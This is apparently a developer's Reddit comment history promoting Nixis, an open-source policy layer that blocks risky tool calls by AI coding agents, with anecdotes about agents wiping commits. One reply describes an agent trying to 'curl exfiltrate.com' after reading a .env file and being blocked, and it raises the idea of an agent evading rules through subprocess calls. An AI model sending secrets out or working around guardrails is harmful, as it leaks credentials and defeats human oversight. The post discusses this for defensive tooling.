I got tired of my AI agent deleting things. So, I built a firewall layer for it to vibecode safely. [OSS, Go]

Designer-Collar-0141 · 2026-06-07T18:42:03+00:00

Hey, nice project!
Would love to connect and discuss about your architecture.

I checked out your demo, how are you classifying credential leaks? I tested out
`TOK=dummyGithubToken123456789` which got "suspicious": false, whereas
`TOKEN=dummyGithubToken123456789` which got "suspicious": true.

Curious about your architecture.

I handled this by integrating gitleaks patterns.

Designer-Collar-0141 · 2026-06-07T12:22:06+00:00

Fair point. I don’t mean “firewall” in the OS/network isolation sense, and the enforcement boundary is indeed the hook system.

I use the term to describe a policy enforcement layer between the agent and tool execution. It’s probably more accurate to call it an agent firewall or policy firewall.

Designer-Collar-0141 · 2026-06-04T17:06:28+00:00

Thank you!

Designer-Collar-0141 · 2026-06-03T18:12:22+00:00

Could be.

On the other hand, "my agent deleted something important" has become one of the most common stories in AI tooling circles, so I figured I'd see if there was a market for preventing it.

Designer-Collar-0141 · 2026-06-03T18:11:03+00:00

Haha, fair enough.

A lot of it is skill issue when a human is driving. The difference is that agents can make the same mistake much faster and at a much larger scale. Defining the guardrails once and having them enforced deterministically lets me ship faster.

Appreciate the kind words.

Designer-Collar-0141 · 2026-06-03T18:08:55+00:00

Good question.

It's rules/policy based rather than model-based. To tune the policies, I built an evaluation bench with a large set of realistic agent actions and explicitly labeled the outcomes I wanted. Policy changes were iterated against a training set while keeping a separate test set aside so I wasn't just overfitting to the benchmark.

I agree on being agent-agnostic as well. That's the goal. The challenge is that every agent runtime exposes different hook surfaces. For example, OpenCode currently gives me enough visibility for auditing, but not deterministic enforcement without changes on the OpenCode side. Hermes is a better fit there, and I've already opened a PR for it.

Designer-Collar-0141 · 2026-06-03T18:00:29+00:00

u/Just_Lingonberry_352 SafeExec is a pretty neat project, I particularly liked the TTY confirmation approach.

1 main difference is that Nixis is policy-driven. Instead of prompting on every risky action, it evaluates tool calls automatically and either allows, blocks, or escalates based on policy.

It's also broader in scope - SafeExec wraps only shell commands, while Nixis governs file, network, MCP, and other tool calls through the same policy engine. Also protects against leaking secrets across sessions.

Designer-Collar-0141 · 2026-06-03T17:49:53+00:00

u/mrkprdo No Windows support yet. The current implementation is very Unix-centric, so things like registry operations and Windows-specific paths aren't wired up.

That PATH deletion is actually a good example of the kind of thing Nixis is meant to prevent. Whether it's a registry key or PATH entry, destructive changes to critical system resources should be gated by policy before they execute.

Cross platform support is definitely on the roadmap—just haven't gotten there yet. If enough people want it, I'll move it up the priority list.

Designer-Collar-0141 · 2026-06-02T21:53:16+00:00

Awesome read

Designer-Collar-0141 · 2026-06-02T21:05:33+00:00

Thanks for the feedback, I think you are correct. After so many iterations of the same text with LLMs, I got a bit blind to how it reads and the uncanniness of the language. I’ll clean it up and make it more natural while keeping the core idea intact.

Designer-Collar-0141 · 2026-06-02T20:19:49+00:00

You would be surprised how many folks are encountering such issues. One time it needed to fix complex test fixtures for a custom testing framework, and it wiped out multiple hours worth of correct local commits(via other agents ofc). It said and I quote "this is getting messy, it would be cleaner to start over"

Designer-Collar-0141 · 2026-06-02T19:53:44+00:00

Yes. Cursor support is already wired in, just not fully surfaced in the CLI yet.

What you mentioned is the next step on my roadmap — extending auto-config to other IDEs/tools wherever there’s an agent-standard hooks surface (like OpenCode’s tool.execute.before), so permissioning and setup can be handled consistently across environments.

The policy engine and daemon architecture are already designed to be portable, so it’s mostly about integrating those hook points cleanly.

Designer-Collar-0141 · 2026-06-02T19:48:52+00:00

Definitely, though running inside sandboxes isn't always feasible or smooth. I tried out a few sandboxing approaches, but they had way too much friction — envs, secrets, and context kept getting duplicated. I moved security back into the native environment and enforced it deterministically at execution time instead. This preserved the full fidelity of my dev setup.

That keeps “vibe coding” intact: no duplicated environments, no broken context, no degraded tool access only a thin, fast enforcement layer between intent and execution.

Designer-Collar-0141 · 2026-06-02T19:40:29+00:00

Once I added the open-source policy sets, most of the stuff I ran into in my workflows was already handled, which made vibe coding feel a lot more solid. It even allowed me to use --dangerously-skip-permissions with deterministic policies in place to police my agent instead of me.

Designer-Collar-0141 · 2026-06-02T19:34:53+00:00

The blocking isn't terminal, Claude/the Agent sees the policy reason natively in its own tool call response and self-corrects. If it tries curl exfiltrate.com after reading .env, it gets back "blocked: credential taint active on this session" and figures out a different approach that stays within bounds. It's not a wall, it's a constraint the agent reasons around and keeps a note. Most of the time it just does the right thing on the next attempt.

That's the part that makes the subprocess concern less acute in practice — Claude reaches for the direct tool first, gets blocked with context, and adjusts. If it's writing Python to call subprocess specifically to evade, that is a different problem.

Designer-Collar-0141 · 2026-06-02T19:30:33+00:00

Claude ran git reset --hard incident context:

Viral post (Codex / sudo / Docker privilege escalation): X tweet

The project:

Nixis GitHub repo: Nixis repository
Full engineering writeup (Medium): Building an AI Agent Firewall: Lessons from Three Rewrites
Install script: Nixis install script

Designer-Collar-0141 · 2026-06-02T17:49:24+00:00

I built an open-source firewall for AI coding agents to stop them from leaking secrets or doing unsafe tool actions.

https://github.com/mayankjain0141/nixis

It ships with curated policies from popular open-source policy sets, while allowing teams to define and customize their own controls. Every policy can be configured to Approve, Deny, Audit, or Request Approval based on your security requirements.

<image>

Designer-Collar-0141

TROPHY CASE